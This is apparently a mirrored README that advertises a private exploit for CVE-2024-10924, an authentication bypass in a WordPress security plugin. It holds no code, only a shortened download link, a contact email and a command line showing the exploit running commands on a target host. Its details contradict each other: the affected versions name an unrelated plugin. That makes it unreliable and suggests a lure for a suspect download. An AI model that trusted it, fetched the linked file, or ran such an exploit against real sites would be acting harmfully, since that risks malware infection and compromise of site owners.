关联漏洞
Description
CVE-2024-10924 Authentication Bypass Using an Alternate Path or Channel (CWE-288)
介绍
# CVE-2024-10924 Authentication Bypass Using an Alternate Path or Channel (CWE-288)
## Overview
The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This vulnerability is caused by improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. It affects installations where the "Two-Factor Authentication" setting is enabled, which is disabled by default.
## Exploit:
## [Download here](https://bit.ly/4ezeMHe)
## Details
+ **CVE ID**: CVE-2024-10924
+ **Published**: 11/16/2024
+ **Impact**: Unconfidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability allows unauthenticated attackers to log in as any existing user on the site, including administrators. The potential impact is severe, as it could lead to complete compromise of the WordPress site. An attacker could gain full administrative access, potentially allowing them to modify content, install malicious plugins, access sensitive information, or use the compromised site for further attacks.
## Affected Versions
AJAX Random Posts<= 0.3.3
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact: brahmanskiy@outlook.com**
+ [Download here](https://bit.ly/4ezeMHe)
文件快照
[4.0K] /data/pocs/0938d81ab5b378ae61dad529803021615b0ced35
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。